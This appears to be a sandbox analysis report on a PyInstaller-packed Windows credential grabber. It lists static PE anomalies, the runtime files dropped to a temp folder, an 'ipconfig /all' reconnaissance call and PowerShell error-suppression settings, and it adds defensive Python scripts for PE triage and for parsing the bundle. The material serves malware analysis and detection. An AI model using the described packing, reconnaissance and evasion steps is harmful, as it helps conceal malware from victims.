                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1474323542.00007FF8E72E8000.00000040.00000001.01000000.00000004.sdmp
                Source: Binary string: System.Runtime.Serialization.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1488870171.00007FF8E7A07000.00000040.00000001.01000000.00000013.sdmp
                Source: Binary string: System.Xml.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Runtime.Serialization.ni.pdbRSDSg@h source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1469630464.00007FF8E6BCA000.00000040.00000001.01000000.0000000F.sdmp
                Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmp
                Source: Binary string: System.ni.pdbRSDS source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Configuration.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000000.00000003.1387564300.000001C12B86F000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1499835574.00007FF8F8754000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
                Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1497747676.00007FF8E81F1000.00000040.00000001.01000000.0000000B.sdmp
                Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1469630464.00007FF8E6BCA000.00000040.00000001.01000000.0000000F.sdmp
                Source: Binary string: System.Configuration.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Data.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Data.ni.pdbRSDSC source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Xml.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.pdb source: bound.exe, 00000011.00000002.1605507236.00000254B6D83000.00000004.00000800.00020000.00000000.sdmp, WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Numerics.ni.pdbRSDSautg source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1500164884.00007FF8F9181000.00000040.00000001.01000000.0000000D.sdmp
                Source: Binary string: System.Data.pdbH source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Windows.Forms.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: mscorlib.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe
                Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1498932456.00007FF8E83BB000.00000040.00000001.01000000.00000008.sdmp
                Source: Binary string: System.Drawing.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1499964052.00007FF8F8D81000.00000040.00000001.01000000.00000012.sdmp
                Source: Binary string: System.Core.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Runtime.Serialization.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1498719679.00007FF8E8371000.00000040.00000001.01000000.0000000A.sdmp
                Source: Binary string: System.Numerics.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\libssl-3.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1490107533.00007FF8E7AA5000.00000040.00000001.01000000.00000010.sdmp
                Source: Binary string: System.ni.pdb source: WER40B.tmp.dmp.29.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WER40B.tmp.dmp.29.dr
                Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe, 00000002.00000002.1495132572.00007FF8E80FE000.00000040.00000001.01000000.0000000E.sdmp
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                Data Obfuscation

                Source: 2.3.SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe.1dcb65700d0.2.raw.unpack, DynamicUtils.cs.Net Code: CreateSharpArgumentInfoArray
                Source: 2.3.SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe.1dcb65700d0.2.raw.unpack, LateBoundReflectionDelegateFactory.cs.Net Code: CreateDefaultConstructor
                Source: 2.3.SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe.1dcb65700d0.0.raw.unpack, DynamicUtils.cs.Net Code: CreateSharpArgumentInfoArray
                Source: 2.3.SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exe.1dcb65700d0.0.raw.unpack, LateBoundReflectionDelegateFactory.cs.Net Code: CreateDefaultConstructor
                Source: VCRUNTIME140.dll.0.drStatic PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E6C89060 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00007FF8E6C89060
                Source: python313.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x1cb64b
                Source: _ctypes.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1f35a
                Source: unicodedata.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x46d69
                Source: _bz2.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xdba7
                Source: libffi-8.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xa1d1
                Source: _ssl.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x17cae
                Source: sqlite3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xa8f8a
                Source: SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeStatic PE information: real checksum: 0x7e5fcb should be: 0x7e01b6
                Source: libcrypto-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x197f77
                Source: _queue.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x11959
                Source: _socket.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1a226
                Source: _decimal.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1fcc8
                Source: _hashlib.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xdd74
                Source: libssl-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x4330c
                Source: select.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x7797
                Source: _lzma.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x21293
                Source: _sqlite3.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x15eca
                Source: libffi-8.dll.0.drStatic PE information: section name: UPX2
                Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
                Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E796AC25 push rcx; ret 2_2_00007FF8E796AC62
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 2_2_00007FF8E7A44331 push rcx; ret 2_2_00007FF8E7A44332
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF88664D2A5 pushad ; iretd 11_2_00007FF88664D2A6
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF88676861B push ebx; ret 11_2_00007FF88676862A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF88676862B push ebx; ret 11_2_00007FF8867686CA
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF8868333EE pushfd ; iretd 11_2_00007FF8868333F0
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF886837A9C push esi; iretd 11_2_00007FF886837A9D
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FF886839266 push esi; iretd 11_2_00007FF886839267
                Source: C:\Users\user\AppData\Local\Temp\bound.exeCode function: 17_2_00007FF88677D668 push ss; retf 17_2_00007FF88677D837
                Source: C:\Users\user\AppData\Local\Temp\bound.exeCode function: 17_2_00007FF88677481F push esp; retf 17_2_00007FF886774821
                Source: C:\Users\user\AppData\Local\Temp\bound.exeCode function: 17_2_00007FF886774829 push esp; retf 17_2_00007FF88677482A
                Source: C:\Users\user\AppData\Local\Temp\bound.exeCode function: 17_2_00007FF88677A272 push ebx; retf 17_2_00007FF88677A282
                Source: initial sampleStatic PE information: section name: UPX0
                Source: initial sampleStatic PE information: section name: UPX1
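The three static findings in this block (a CheckSum field that is zero on every bundled Python DLL and wrong on the main sample, a COFF timestamp in 2034 on VCRUNTIME140.dll, and UPX0/UPX1 section names on the dropped files) are cheap to reproduce without a sandbox. The script below is an added example written for this page, not code from the Joe Sandbox report or from the sample: it recomputes the optional-header CheckSum the way imagehlp's CheckSumMappedFile does, reads the COFF TimeDateStamp, and lists section names, and exercises all three on a constructed PE32+ header skeleton. Header offsets come from the PE format; the helper names (`build_minimal_pe`, `triage`) and the skeleton's field values are this example's own. It assumes `e_lfanew` is 4-byte aligned, which real images satisfy.

```python
import struct
import time
import datetime


def _pe_offsets(data: bytes):
    """(e_lfanew, optional header offset, SizeOfOptionalHeader, NumberOfSections) from the headers."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    size_opt = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    return e_lfanew, e_lfanew + 24, size_opt, num_sections


def pe_checksum(data: bytes) -> int:
    """Recompute the optional-header CheckSum like imagehlp!CheckSumMappedFile: a 16-bit
    end-around-carry sum over the whole file, skipping the CheckSum field itself, plus the
    file size. Summing 32-bit words and folding carries equals summing 16-bit words."""
    _, opt_off, _, _ = _pe_offsets(data)
    field = opt_off + 64                      # CheckSum is at +64 in both PE32 and PE32+
    total = 0
    for off in range(0, len(data), 4):        # assumes e_lfanew (hence `field`) is 4-byte aligned
        if off == field:
            continue
        total += struct.unpack("<I", data[off:off + 4].ljust(4, b"\0"))[0]
        total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return (total & 0xFFFF) + len(data)


def stored_checksum(data: bytes) -> int:
    _, opt_off, _, _ = _pe_offsets(data)
    return struct.unpack_from("<I", data, opt_off + 64)[0]


def coff_timestamp(data: bytes) -> int:
    return struct.unpack_from("<I", data, _pe_offsets(data)[0] + 8)[0]


def section_names(data: bytes) -> list:
    _, opt_off, size_opt, n = _pe_offsets(data)
    table = opt_off + size_opt                # section table follows the optional header, 40 bytes each
    return [data[table + 40 * i:table + 40 * i + 8].rstrip(b"\0").decode("latin-1") for i in range(n)]


def triage(data: bytes, now_ts: int = None) -> dict:
    """The three static signals from the report: checksum state, build timestamp, packer sections."""
    now_ts = int(time.time()) if now_ts is None else now_ts
    stored, computed = stored_checksum(data), pe_checksum(data)
    ts, names = coff_timestamp(data), section_names(data)
    return {
        "stored_checksum": stored, "computed_checksum": computed,
        "checksum_unset": stored == 0,        # the linker or packer never filled the field
        "checksum_ok": stored == computed,    # False with a non-zero value: bytes changed after linking
        "timestamp_utc": datetime.datetime.fromtimestamp(ts, datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "timestamp_in_future": ts > now_ts,
        "sections": names,
        "upx_packed": any(n.startswith("UPX") for n in names),
    }


def build_minimal_pe(sections=(), checksum=0, timestamp=0) -> bytes:
    """Constructed PE32+ skeleton (headers only, no code) used to exercise the checks above."""
    img = bytearray(b"MZ".ljust(0x3C, b"\0") + struct.pack("<I", 0x40))            # e_lfanew = 0x40
    img += b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, len(sections), timestamp, 0, 0, 0xF0, 0x0022)
    opt = bytearray(0xF0)
    struct.pack_into("<H", opt, 0, 0x20B)                                           # PE32+ magic
    struct.pack_into("<I", opt, 64, checksum)
    img += opt
    for name in sections:
        img += name.encode().ljust(8, b"\0") + bytes(32)                            # zeroed section header
    return bytes(img)


if __name__ == "__main__":
    sample = build_minimal_pe(sections=("UPX0", "UPX1", ".rsrc"), timestamp=0x78BDDED1)
    for key, value in triage(sample).items():
        print(f"{key}: {value}")
```

Two caveats when reading these signals. The user-mode loader never verifies the CheckSum (Windows checks it only for drivers and boot-time images), so a field of 0, as on every Python DLL dropped here, only says the build step never computed one; a non-zero mismatch such as the sample's 0x7e5fcb against a computed 0x7e01b6 says the file was altered after the linker ran, which is exactly what appending a PyInstaller archive as an overlay does. The 2034 timestamp on VCRUNTIME140.dll is what MSVC's reproducible-build mode (/Brepro) produces: the field holds a content hash rather than a build time, so a future date on a Microsoft runtime DLL is expected and the "suspicious time stamp" signal carries weight only on the sample's own PE, not on the redistributables it drops.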

                Persistence and Installation Behavior

                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\VCRUNTIME140.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\libcrypto-3.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\libffi-8.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\_ctypes.pyd
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\python313.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\_queue.pyd
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\sqlite3.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\_socket.pyd
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\unicodedata.pyd
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\_lzma.pyd
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\_sqlite3.pyd
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\libssl-3.dll
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\select.pyd
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\_decimal.pyd
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\_hashlib.pyd
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\rar.exe
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\_bz2.pyd
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI76122\_ssl.pyd
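A `%TEMP%\_MEI<number>` directory filled with python3xx.dll, CPython extension modules and the OpenSSL/sqlite DLLs is the run-time footprint of a PyInstaller onefile executable: the bootloader carries the whole bundle as an overlay and unpacks it before starting the embedded script. The same inventory can be read statically from the overlay's table of contents. The parser below is an added example for this page, not PyInstaller's code and not taken from the report; the cookie magic `MEI\014\013\012\013\016`, the `!8sIIii64s` cookie struct and the `!iIIIBc` TOC entry struct are the CArchive layout as I know it from PyInstaller's bootloader and `PyInstaller.archive.readers`, and should be checked against the PyInstaller version of interest. It runs on a constructed bundle built by `build_sample_bundle`, which is this example's own helper; padding TOC entries to 16 bytes is an assumption about the writer that the reader does not depend on.

```python
import struct
import zlib

MAGIC = b"MEI\014\013\012\013\016"
COOKIE_FMT = "!8sIIii64s"    # magic, package length, TOC offset, TOC length, python version, python lib name
COOKIE_LEN = struct.calcsize(COOKIE_FMT)   # 88 bytes
ENTRY_FMT = "!iIIIBc"        # entry length, data offset, compressed len, uncompressed len, compressed flag, type code
ENTRY_LEN = struct.calcsize(ENTRY_FMT)     # 18 bytes
TYPE_CODES = {b"b": "binary (dll/pyd/exe)", b"z": "PYZ archive", b"s": "script",
              b"x": "data", b"m": "module", b"M": "package", b"Z": "zipfile"}


def parse_pyinstaller_bundle(data: bytes):
    """None if no CArchive cookie is present, else the cookie fields plus the TOC entries."""
    cookie_pos = data.rfind(MAGIC)      # search from the end: the bootloader's own data may hold the magic too
    if cookie_pos < 0:
        return None
    _, pkg_len, toc_off, toc_len, pyver, pylib = struct.unpack_from(COOKIE_FMT, data, cookie_pos)
    archive_start = cookie_pos + COOKIE_LEN - pkg_len          # package length counts the cookie
    toc = data[archive_start + toc_off:archive_start + toc_off + toc_len]
    entries, i = [], 0
    while i + ENTRY_LEN <= len(toc):
        entry_len, pos, clen, ulen, cflag, typcd = struct.unpack_from(ENTRY_FMT, toc, i)
        if entry_len < ENTRY_LEN:                               # corrupt or truncated TOC
            break
        name = toc[i + ENTRY_LEN:i + entry_len].rstrip(b"\0").decode("utf-8", "replace")
        entries.append({"name": name, "type": typcd, "kind": TYPE_CODES.get(typcd, "?"),
                        "offset": archive_start + pos, "clen": clen, "ulen": ulen,
                        "compressed": bool(cflag)})
        i += entry_len
    return {"archive_start": archive_start, "pyver": pyver,
            "pylib": pylib.rstrip(b"\0").decode("utf-8", "replace"), "entries": entries}


def extract_entry(data: bytes, entry: dict) -> bytes:
    """Pull one entry's bytes out of the overlay without ever running the bundle."""
    raw = data[entry["offset"]:entry["offset"] + entry["clen"]]
    return zlib.decompress(raw) if entry["compressed"] else raw


def build_sample_bundle(stub: bytes = b"MZ-bootloader-stand-in") -> bytes:
    """Constructed onefile bundle: a stand-in bootloader prefix followed by a CArchive overlay."""
    files = [("python313.dll", b"b", b"MZ fake python dll body"),
             ("libcrypto-3.dll", b"b", b"MZ fake openssl body"),
             ("PYZ-00.pyz", b"z", b"PYZ\0 fake module archive"),
             ("main", b"s", b"import os\n# stand-in for the bundled entry script\n")]
    payload, toc = b"", b""
    for name, typ, body in files:
        comp = zlib.compress(body)
        name_b = name.encode() + b"\0"
        entry_len = ENTRY_LEN + len(name_b)
        entry_len += (-entry_len) % 16                          # ASSUMPTION: 16-byte entry padding
        toc += struct.pack(ENTRY_FMT, entry_len, len(payload), len(comp), len(body), 1, typ)
        toc += name_b.ljust(entry_len - ENTRY_LEN, b"\0")
        payload += comp
    pkg_len = len(payload) + len(toc) + COOKIE_LEN
    cookie = struct.pack(COOKIE_FMT, MAGIC, pkg_len, len(payload), len(toc), 313, b"python313.dll")
    return stub + payload + toc + cookie


if __name__ == "__main__":
    bundle = build_sample_bundle()
    info = parse_pyinstaller_bundle(bundle)
    print(f"python {info['pyver']} via {info['pylib']}, {len(info['entries'])} entries")
    for e in info["entries"]:
        print(f"  {e['name']:<20} {e['kind']:<22} {e['ulen']} bytes")
```

Entries of type `b` are what lands in `_MEI76122`; the entry of type `s` is the script the grabber actually runs and the first thing to pull out for analysis. Two practical notes: the `_MEI` suffix is per run (on Windows PyInstaller derives it from the bootloader's process id), so `_MEI76122` is not a stable indicator and detections should key on the `%TEMP%\_MEI*` pattern plus the file set; and among an otherwise stock CPython runtime, the bundled rar.exe is the one file that does not belong to the interpreter.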

                Hooking and other Techniques for Hiding and Protection

                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeCode function: 0_2_00007FF7EAD05830 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF7EAD05830
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
